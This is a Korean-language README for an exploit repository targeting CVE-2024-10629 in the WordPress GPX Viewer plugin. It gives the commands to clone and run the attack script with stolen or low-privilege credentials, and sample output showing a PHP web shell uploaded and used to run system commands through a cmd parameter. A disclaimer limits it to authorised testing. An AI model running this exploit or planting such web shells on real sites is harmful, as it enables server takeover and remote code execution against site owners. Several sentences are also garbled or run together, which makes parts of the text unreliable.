
GPX Viewer <= 2.2.8 - 인증된 (구독자+) 임의 파일 생성
이 저장소는 WordPress용 GPX Viewer 플러그인의 개념 증명 익스플로잇을 포함합니다. 이 플러그인은 임의 파일 생성 취약점(CVE-2024-10629)에 취약합니다. 이 취약점을 통해 구독자 수준 이상의 인증된 공격자가 영향을 받는 사이트의 서버에 임의 파일을 생성할 수 있으며, 이로 인해 원격 코드 실행이 가능해질 수 있습니다.
WordPress용 GPX Viewer 플러그인은 버전 2.2.8 이하의 모든 버전에서 gpxv_file_upload() 함수에 기능 검사와 파일 유형 검증이 누락되어 임의 파일 생성에 취약합니다. 이로 인해 구독자 수준 이상의 인증된 공격자가 영향을 받는 사이트의 서버에 임의 파일을 생성할 수 있으며, 이는 원격 코드 실행을 가능하게 할 수 있습니다.
requests 라이브러리저장소 복제:
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
필요한 라이브러리 설치:
pip install requests
익스플로잇 실행:
python exploit.py -u <target_url> -un <username> -p <password>
<target_url>, <username>, <password>를 적절한 값으로 바꾸세요.
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
ls)을 실행합니다.[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = 파일 표시uname -a = 시스템 정보 표시이 익스플로잇은 교육 목적과 승인된 테스트만을 위해 제공됩니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 이 익스플로잇을 무단 사용하는 것은 불법이며 비윤리적입니다. 이 저장소의 작성자와 기여자는 이 익스플로잇으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.
작성자: Khaled Alenazi (Nxploit)